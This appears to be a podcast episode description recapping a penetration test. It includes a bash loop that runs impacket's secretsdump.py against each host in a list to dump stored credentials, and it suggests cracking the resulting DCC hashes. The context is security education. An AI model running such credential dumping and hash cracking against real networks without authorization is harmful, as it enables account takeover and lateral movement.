Listen

Description

Hey friends, today we share the (hopefully) thrilling conclusion of last week's pentest. Here are some key points:

#!/bin/bash File="localadmin.txt" Lines=$(cat $File) for Line in $Lines do         echo --- $Line --- >> dump.txt         echo --------------------- >> dump.txt         sudo python3 /opt/impacket/examples/secretsdump.py -k "$Line" >> dump.txt         echo --------------------- >> dump.txt done 

From those dumps you can definitely try to crack the DCC hashes using a local or cloud cracker - see our series on this topic for some guidance.